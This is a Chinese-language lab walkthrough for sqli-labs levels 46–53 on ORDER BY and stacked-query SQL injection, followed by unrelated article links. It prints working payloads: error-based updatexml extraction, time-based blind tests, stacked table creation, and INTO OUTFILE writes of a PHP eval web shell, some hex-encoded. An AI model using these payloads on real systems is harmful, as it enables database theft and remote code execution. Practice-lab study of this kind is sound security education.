sqli-libs(46-53关)
Less_46
补充知识:MySQL知识
SQL语句中,asc是指定列按升序排列,desc则是指定列 按降序排列;
Select * from users order by 1 desc; 使用降序进行排列;
Select * from users order by 1 asc; 使用升序进行排列;
Right() select right(database(),1) 从右往左数第一个数据库;
Left() select left(database(),1) 从左往右数第一个数据库;
less46没有使用包裹
输入?id=1 得到下面,所以我们使用?sort=1 进行操作 其中1代表把第一列按从小到大进行排列;
修改为2,即为将第二列按从小到大进行排列;
?Sort=2 desc; 使用降序进行排列;
?Id=2 asc; 使用升序进行排列;
说明这里存在注入漏洞
三种方法:
1.报错注入
2.时间盲注
3.一句话木马
方法一:报错注入
输入:?sort=3 and updatexml( 1, concat( 0x7e, (database())), 1) --+ 得到当前数据库;
输入:?sort=3 and updatexml( 1, concat( 0x7e, (select schema_name from information_schema.schemata limit 0,1), 1) ,1)--+ 得到第一个数据库名字;
方法二: 时间盲注
输入:?sort=3 and if(length(database()=1),1,sleep(5))--+
输入:?sort=3 and if(left((select schema_name from information_schema.schemata limit 0,1),1)>'s',1,sleep(5))--+
方法三:一句话木马
输入 ?sort=3 and (select '<?php @eval($_POST[gxy]);?>') into outfile 'C:\\phpStudy\\WWW\\c.php '--+
我们并没有把一句话木马写进去,所以我们采取 lines terminated by 0x 十六进制进行注入;
输入 ?sort=3 into outfile "C:\\phpStudy\\WWW\\c.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e --+
Less_47
Less47:使用’’包裹 其他与第46关基本一致
Less_48
Less48: 无包裹 不返回报错信息 不能使用报错注入,其他操作与第46关基本一致。
Less_49
Less49: 使用“”包裹 不返回报错信息 不能使用报错注入,其他操作与第46关基本一致
Less_50
Less50无包裹
第50关与第46关不同的是 使用了mysqli_multi_query函数
mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。
所以我们可以用堆叠注入的方法;
五种方法:
1.时间的盲注
2.报错注入
3.写一句话木马
4.使用堆叠注入创建删除一个表
5.使用堆叠 注入写一句话木马
方法一:时间盲注
?sort=1 and if(length(database()>1),1,sleep(5)) --+
方法二:报错盲注
?sort=1 and updatexml(1,concat(0x7e,(database())),1)--+
方法三:写一句话木马
输入:?sort=1 and (select '<?php @eval($_POST[ztt]);?>') into outfile 'C:\\phpStudy\\WWW\\a.php '--+
发现一句话木马并没有,输入:?sort=1 into outfile "C:\\phpStudy\\WWW\\a.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e --+
方法四:使用堆叠注入创建一个表
?sort=3;create table ztt50 like users;insert into ztt50 select * from users;--+
Less_51
Less-51: 使用’’包裹 其他操作与第50关基本一致。
五种方法:
1.时间的盲注
2.报错注入
3.写一句话木马
4.使用堆叠注入创建删除一个表
5.使用堆叠 注入写一句话木马
Less_52
Less-52: 无包裹 回显不显示错误 不能使用报错注入,则其他方法与第50关基本一致
四种方法:
1.时间的盲注
2.写一句话木马
3.使用堆叠注入创建删除一个表
4.使用堆叠 注入写一句话木马
Less_53
Less-53:使用’’包裹 不回显错误 不能使用报错注入 其他方法与第50关基本一致。
四种方法:
1.时间的盲注
2.写一句话木马
3.使用堆叠注入创建删除一个表
4.使用堆叠 注入写一句话木马
sqli-libs(46-53关)的更多相关文章
- SD card技术了解并WINCE下SDHC驱动开发(updated)
Suumary: 简单介绍了一下SD卡的历史和发展,同时结合MX31 ADS上的WINCE 下SDHC驱动更深入的了解该硬件的一些行为特点. 了解SD card SD是Secure Digital C ...
- SQL-三级分类查询
/*SQLyog 企业版 - MySQL GUI v8.14 MySQL - 5.5.40 : Database - appinfodb******************************** ...
- mysql表基本查询
第一节 -- or # 单行注释/***多行注释*/ -- c创建数据库examCREATE DATABASE exam; USE exam; /*创建部门表*/CREATE TABLE dept( ...
- MySQL内存计算器
MySQL如何使用内存? 首先,介绍MySQL使用内存的一些方法: 1. 会话级别的内存消耗(连接私有内存):如sort_buffer_size等,每个会话都会开辟一个sort_buffer_size ...
- bzoj AC倒序
Search GO 说明:输入题号直接进入相应题目,如需搜索含数字的题目,请在关键词前加单引号 Problem ID Title Source AC Submit Y 1000 A+B Problem ...
- Linux软件包管理和磁盘管理实践
一.自建yum仓库,分别为网络源和本地源 本地yum仓库的搭建就是以下三个步骤: 创建仓库目录结构 上传相应的包到目录下,或者直接挂载光盘也行,如果挂载光盘,第三步就可以省略,因为光盘默认里有repo ...
- Oracle精讲视频课程【价值1.67万】
ke程链接 https://edu.51cto.com/center/course/lesson/index?id=14443 课程大纲: 0_Oracle学习路线分析(Oracle学习必读)[免费试 ...
- 资源描述结构(Resource Description Framework,RDF)
资源描述框架(Resource Description Framework),一种用于描述Web资源的标记语言.RDF是一个处理元数据的XML(标准通用标记语言的子集)应用,所谓元数据,就是" ...
- 获取文本的编码类型(from logparse)
import java.io.BufferedReader; import java.io.File; import java.io.FileInputStream; import java.io.F ...
- [机器学习] 深度学习之caffe1——软件配置与测试
caffe的编译配置真的是很让人头疼啊,不知道试过多少次了~~~ 重装系统了七八次,搞得linux的一些常用命令倒是很熟悉了~~~ 我有洁癖~~~某一个点上出了错,我一定要把它搞好了,再重新来一次,我 ...
随机推荐
- 【巨杉数据库SequoiaDB】巨杉数据库荣获《金融电子化》“金融科技创新奖”
巨杉助力金融科技创新 2019年12月19日,由<金融电子化>杂志社主办.北京金融科技产业联盟协办的“2019中国金融科技年会暨第十届金融科技及服务优秀创新奖颁奖典礼”在京成功召开.来自金 ...
- 【巨杉数据库SequoiaDB】巨杉Tech | 巨杉数据库数据高性能数据导入迁移实践
SequoiaDB 一款自研金融级分布式数据库产品,支持标准SQL和分布式事务功能.支持复杂索引查询,兼容 MySQL.PGSQL.SparkSQL等SQL访问方式.SequoiaDB 在分布式存储功 ...
- [POI2008] STA-Station - 树形dp
很显然的递推式ans[q] = ans[p] + n - 2*siz[q]; 这么个题你卡我常干嘛,害得我加快读 (谁叫我是vector党呢 #include <bits/stdc++.h> ...
- Hbase出现ServerNotRunningYetException的解决方案(退出hadoop的安全模式)
退出安全模式 ./hadoop dfsadmin -safemode leave 然后出现 safemode off就成功了
- webpack如何编译ES6打包
前言:随着ES的普及我们越来越多的开始使用ES6的语法了,当然也随着mvvm框架的流行少不了js模块化,那js模块化又有那些呢 在很早的时候大家都用的命名空间,现在也有人用(库名.类别名.方法名) 后 ...
- Intellij IDEA史上最全快捷键大全
古人有云:工欲善其事,必先利其器,要是只是手握利器,而不能发挥其最大的效益,那无异于赤手空拳,对敌对垒. 那古人所云,未得其精髓,只能为碎语闲言尔. 自动代码 常用的有fori/sout/psvm+T ...
- JDBC未知列
Exception in thread "main" com.mysql.jdbc.exceptions.jdbc4. MySQLSyntaxErrorException: Unk ...
- go语言 base64编码解码
package main import ( "encoding/base64" "fmt" ) func main() { str := "Man&q ...
- 1、Two Sum
Given an array of integers, return indices of the two numbers such that they add up to a specific ta ...
- Android 开发 微信分享,登陆,获取信息
1 获取appid和appsecret. https://open.weixin.qq.com/cgi-bin/index?t=home/index&lang=zh_CN ...